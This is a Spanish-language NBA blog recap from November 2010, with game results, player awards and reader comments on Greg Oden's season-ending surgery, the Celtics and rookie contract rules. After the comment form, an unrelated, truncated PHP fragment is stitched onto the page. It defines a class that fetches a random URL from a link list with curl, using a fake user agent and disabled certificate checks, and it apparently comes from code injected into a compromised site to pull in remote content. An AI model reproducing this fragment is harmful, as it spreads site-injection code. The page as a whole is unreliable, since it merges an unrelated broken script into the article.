La Crónica (17/11/2010)

18 de November de 2010 por Hynreck

Madrugada intensa de partidos la de esta noche en la NBA. Rápidamente hacemos un pequeño resumen pero antes hemos de comentar la noticia que ha asolado Portland. Greg Oden dice adiós a la temporada al tener que pasar otra vez por quirófano. Al parecer se trata de una lesión completamente diferente de la de 2009 y es que el pobre chico (recordemos que sólo cuenta con 22 años) no levanta cabeza. Habrá que ver este verano si los Blazers ejercen la Team option que tienen sobre él, o si el que proclamaron el pívot dominante del siglo XXI tiene que buscarse las habichuelas lejos de Oregon.

Entrando estrictamente en materia, los Suns visitaban el American Airlines de Miami para llevarse de recuerdo una buena tunda por parte de los locales (96-123). Chris Bosh abusó del juego interior de los Suns y con 35 puntos y 6 rebotes firmó su mejor partido de la temporada. Por los Suns sorprendente las únicas 2 asistencias de Nash y no tan sorprendente la escasa aportación de Turkoglu.

Precisamente el ex-equipo del turco, los Raptors de Calderón, venció en el duelo por todo lo bajo a los Sixers en Philadelphia por 94-86. Sonny Weems y Bargnani comandaron a los canadienses acompañados por una buena actuación de Calderón (tendremos ración de nacionalismo barato en los medios hoy), mientras que por los Sixers Elton Brand parece que recupera sensaciones de su época californiana. El rookie Evan Turner (tremenda su capacidad reboteadora) poco a poco aprovecha la baja de Iguodala, que parece puede tener su futuro lejos de Philly. Jrue Holliday se consolida como base de futuro interesante.

Los Celtics por su parte siguen a lo suyo. Anoche paliza a unos Wizards (83-114) que siguen sin John Wall, lesionado. Cuidadito con ellos como puedan llegar a playoffs con el equipo descansado. De momento Shaq va cogiendo ritmo. Por su parte, los Lakers tumbaron a los Pistons en Detroit (103-90) también sin demasiado esfuerzo. La tripleta Kobe-Pau-Odom se bastó y se sobró para vencer a unos apáticos Pistons. Mala pinta tienen éstos últimos.

El hermano pobre de Los Ángeles sigue sin levantar cabeza pese a que Blake Griffin lo sigue intentando todo. Derrota 111-113 en Minnesota, donde un Buzzer-Beater de Beasley dio la victoria a los Wolves. Nuevo partidazo de Kevin Love (24-14) que presenta su seria candidatura a MIP, y del ya citado Beasley (33-7) que parece que encuentra por fin su sitio en la liga.

En el partidazo de la jornada los sorprendentes (un servidor no se esperaba ni por asomo este rendimiento) Hornets derrotaron a unos Mavericks donde Nowitkzki estuvo demasiado solo (97-99). Chris Paul con 21 puntos y 11 asistencias fue nuevamente el mejor de los suyos, y se colocan con 9-1 en lo más alto.

En los demás partidos, los Spurs derrotaron a los Bulls 94-103, New York ganó en Sacramento 113-106, Utah a New Jersey 88-98 y los Thunder a los decadentes Rockets por 99-116.

PREMIOS

MVP: Palizón de Miami sobre Phoenix con Chris Bosh como jugador más destacado con 35 puntos, 6 rebotes y 4 asistencias. Día de reinvindicaciones tanto para el ala-pívot como para su equipo. Kobe Bryant, con 33 puntos, 9 rebotes y 4 asistencias, comparte el premio.

Rookie: 27 puntos y 17 rebotes de Blake Griffin que dejan la lucha por el ROY en empate técnico. Eso sí, ya les gustaría a todos los rookies de disfrutar de 22 tiros por partido. Su compañero Al-Farouq Aminu también está siendo de los destacados estos últimos días. Anoche se fue a los 17 puntos, 4 rebote sy 3 asistencias.

Sorpresa: A Andrea Bargnani le han caído palos de todas partes pero es justo destacar el partidazo que se marcó ayer y que sirvió a los Raptors para imponerse a los Sixers. El italiano fue el mejor con 30 puntos (12 de 18) y 7 rebotes seguido de cerca por Sonny Weems (25 puntos) y José Calderón (12-5-8). Todos por encima de sus promedios anuales.

Decepción: En términos cuantitativos el 1 de 12 de Travis Outlaw es mucho peor para el equipo que el 0 de 7 de Taj Gibson. Pero es que un 0 en el box score duele tanto… Pero para decepción, la noticia del adiós a lo que resta de temporada de Greg Oden. El chaval ha de estar hundido.

Esfuerzo en vano: Los Hornets se tomaron cumplida revancha hy se impusieron a los Mavs a pesar de los 29 puntos (11 de 19) y 9 rebotes de Dirk Nowitzki. No se puede ganar siempre.

Comenta

17 comentarios a esta entrada

  1. Txusma dice:
    #1

    La historia es cíclica: A los Blazers les ha vuelto a pasar lo mismo que cuando escogieron a Sam Bowie por encima de Michael Jordan. Bowie no era malo, igual que no lo es Oden, pero las lesiones también se cebaron con él.
    Una auténtica pena no poder disfrutar de jugadores con talento por culpa de las lesiones.

      Citar

  2. TheDeerHunter dice:
    #2

    Pues esta semana también tenemos dósis de crónica en rosa… y es que Toni Parker se divorcia de la Longoria.
    Cuestión de cornamenta, se dice, del crack francés. La culpable (o una de las culpables) es Mrs Alexandra Paressant, que estuvo relacionada con Henry. La chica asegura que hay más peña por ahí porque a la Longoria no le mola hacer según qué cosas (como montárselo delante de un espejo, ya ves tú…)

    En otro orden de cosas… ojito con los Celtics, sí. Si fuera poco debuta Delonte West y lo hace bien. Y todavía falta por volver Jermaine. Miedito…

      Citar

  3. Vader dice:
    #3

    Y a los Celtics creo que tambien les falta Perkins…

      Citar

  4. Viva_Dirk dice:
    #4

    La noticia de Oden es brutal, un chaval de 22 años que lo tenia todo para triunfar y el cuerpo le falla, además distintas cosas. Ojalá sea un caso de los que después vuelven a buen nivel, pero nos podemos ir olvidando del pivot dominante que iba a ser.

    Los Celtics ahora mismo ganarían en Este de calle, falta ver como se acoplan los Heat de aquí a play-offs porque los Magics con Van Gundy no les huelen a los Celtics en una serie a 7 partidos.

      Citar

  5. troll dice:
    #5

    Oden…..

      Citar

  6. Cocinitas dice:
    #6

    Por mucho que mejoren los Heat de aquí a playoffs los sigo viendo muy inferiores a los celtics, sobre todo en la pintura y en la aportación de banquillo.
    Creo que es una lastima que un equipo como los rockets con la plantilla que se supone que tienen se empiecen a deajr llevar a estas alturas de la temporada.
    Lo de Oden recuerda mucho al draft de Jordan ya que el elegido en el numero 2 de aquel año fue un tal Kevin Durant que si que tiene pinta de ir para estrella de la liga.
    Los Lakers sin muxo esfuerzo van ganando sus partidos en lo que parece que va a ser un bonito paseo por la conferencia oeste, ya que salvo lesiones llegaran a las 60 victorias sin despeinarse.
    En otro orden de cosas, creo que la batalla por el ROY de este año va a estar reñida hasta el final aunque yo me inclino por Griffin porque me parece un jugador más maduro que Wall, en cuanto al MIP creo que los dos jugadores de Timberwolves van a luchar por ese titulo ya que aparte de Love tambien me esta sorprendiendo mucho la temporada de Beasley.

      Citar

  7. scriers dice:
    #7

    Ayer vi a Miami y ese equipo, de momento, no va a ningún lado. Solo les libró el pésimo partido de unos Suns absolutamente pobres en la zona. ¿Por qué no quitan a Turkoglu que está para el arrastre y muy muy muy lento? Pero Miami está con Lebron de base, una defensa mejorable y el equipo, como decirlo, desconfigurado. A Wade se le está haciendo duro.

    Por otro lado vi a los Raptors y a los Lakers alternándolos. No se quién está peor si Phi76ers o los Raptors, el caso es que el partido se lo llevaron los Raptors es un tipo de partido que serán los que ganen los Raptors este año, haciendo la goma y con suerte al final. Yo no se si juega a la contra y a hacer transiciones (que es donde Derozan y Seems se sienten mejor) o si juegan en estático con Bargnani y Kleiza. Y Calde… bueno, bien, pero no se… no me termina, ha perdido decisión y dominio.

    En cuanto a Los Lakers se pasearon porque si Kobe te mete dos triplacos nada más empezar te acobardas y cualquiera te libra. Yo creo que los Pistons dan para bastante más, pero lo cierto es que es de una irregularidad enorme, además, no están muy claros los roles en ese equipo. Personalmente me agobia la manera de jugar de Stuckey tipo kamikaze. Y me gusto Caracter, ¿por qué no?

      Citar

  8. GreenPride dice:
    #8

    De anoche vi 2 palizones. Los Celtics se pasearon ante los Wizards. Buen partido general de los Celtics con Rondo dirigiendo la orquesta y Shaq muy acoplado al juego Celtic. Debutó Delonte West que lo hizo bastante bien en el hasta ahora claramente mejor equipo en el Este. Por lo Wizards solo los tiros de Nick Young en un equipo que sin Wall no son nada y con él o es un mesías o lo tendran realmente difícil.
    Por su parte el supuesto gran rival de los Celtics se dio otro festín. Primer partidazo de Bosh en Miami ante una nula defensa interior de los Suns que si ya son flojos por dentro, esta vez sin Robin Lopez fueron un auténtico coladero. Si además no estan que se salen en triples y Nash solo da 2 asistencias pues paliza al canto. Empieza a quedar claro que LeBron va a jugar de base, ya veremos con qué resultados aunque parece que las cosas funcionan algo más en ataque para los Heat

      Citar

  9. LEmontus dice:
    #9

    Ese equipo si wall ganó hace un par de dñias y jugando mejor que nunca. Ya podía estar quien quisiera ayer en la pista que a Boston no le ganaban.

      Citar

  10. Hynreck dice:
    #10

    Yo sigo viendo a los Cetics como los grandes tapados, bueno, tapados entre comillas. Me parecen un equipo muy muy competitivo como aguanten físicamente, y tienen un banquillo larguísimo. Y defender, defienden tela.
    Lo de Oden es una auténtica lástima. Esperemos que pueda volver a un nivel decente al menos.

    La camada de rookies a mi parecer está siendo un pelín decepcionante (excepciones hechas de Wall y Griffin), de Evan Turner esperaba algo más, liderazgo tal vez. El nivel físico y la velocidad del juego de momento le está sobrepasando. Cousins despues de un comienzo esperanzador se ha visto desplazado por un tronco como Dalembert, Favors no termina de asentarse y para mí gusto Wesley Johnson puede haber sido un error, ya que debería aportar desde el primer día al ser un jugador que se suponía hecho, tiene 23 años y el margen de mejora respecto a gente como Favors es escasa.

      Citar

  11. Uno cualquiera dice:
    #11

    Por si fuera poco para Portland, se rumorea que las rodillas de Roy están hueso con hueso, artríticas totalmente…

      Citar

  12. xapa_croack dice:
    #12

    Grande oden, si su carrera terminara, saldria cada punto a 24,986$ y 32,060$ por rebote, no esta nada mal.

    La noticia del dia no es que a Parker ya no lo podemos llamar Longorio, para Daimiel seguro que si.

      Citar

  13. sayim dice:
    #13

    A mi me parece que los puntos y rebotes de Oden salgan caros….

    Ese precio lo valen las expectativas que creó. No dudo de su comportamiento profesional (incluso me parece un chaval maduro) y aún confío en que sea un jugador que haga carrera en la liga, no creo que para ser All-Star, pero para jugar 20-25 min en algún equipo sí. Yo si fuera Porlantd le renovaba.

    Cocinitas, “Kevin Durant que si que tiene pinta de ir para estrella de la liga.”???? Tiene pinta de ir????
    Como progrese mas no va para estrella de la liga, va para los libros de historia….

    Es fácil hablar ahora, pero creo recordar que cuando ese draft todo el mundo daba a Oden como Pick 1. Me gustaría saber cuantas franquicias no hubieran escogido a Oden… No lo considero un error, tan solo mala suerte.

    Cambiando de tema, vaya bestialidad de temporada de Blake Griffin. Lleva casi 17+11+2 asist… Lástima de los tiros libres y que haya ido a parar a la franquicia más triste de la NBA. Creo que no se le está dando la importancia que se merece… He leído que solo 8 rookies en la historia han promediado doble-doble en puntos y rebotes. Casi nada al aparato. Lo cambiaba yo por Stoudemire para mis knicks mañana mismo….

      Citar

  14. KB # 24 dice:
    #14

    Una pregunta que no viene al tema, como se determina que un jugador al acabar su vinculo contractual es agente libre o agente restringido? ¿Es el equipo, con el que firma el contrato, el que decide? O es el jugador por su parte? O depende del tipo de contrato que firme, ya sea por trade, de rookie o la bi-anual?

    Gracias por adelantado

      Citar

  15. TheDeerHunter dice:
    #15

    Depende del tipo de contrato que firme.

      Citar

  16. Txusma dice:
    #16

    Los rookies de primera ronda siempre firman un contrato tipo que solo difiere en las cantidades. Los 2 primeros años son garantizados, sobre los 2 siguientes el equipo tiene una Team Option y al acabar este, si el equipo ejerce la Qualyfing Offer, mantiene los derechos de tanteo.
    En realidad el artículo no es del todo correcto pq los Blazers no es que tengan una Team option sobre Oden, lo q pasa es que se acaba el contrato de 4 años de todo rookie de primera ronda y han de decidir si ejercen la Qualyfing Offer que en su cas, al ser número 1 del draft, es muy alta (8.7$). Esto no quiere decir q los Blazers renueven a Oden por 8.7$, sinó que para poder tener derecho de tanteo, sobre el cálculo de su límite salarial pesarán esos 8.7$, dejándolos con menos capacidad de maniobra. Si no ejercen la Qualyfing Offer (q es lo que han hecho los Wolves con Brewer) se qdan sin derechos de tanteo pero aún pueden renovar al jugador si son los q más pagan, sin privilegio alguno.
    Y en el resto de jugadores, es como dice Deer. Según lo q firmes en el contrato habrá Team Options o Player Options en los últimos años de contrato.
    Espero haberte resuelto algo la duda y si alguien ve que me he equivocado que me lo comente q a lo mejor confundo algún término. Esto de los salarios es super liante.

      Citar

  17. KB # 24 dice:
    #17

    Si es que no hay nada mejor que un enfermo para resolver las dudas de los demás enfermos!
    I love this game!
    Gracias Txusma

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>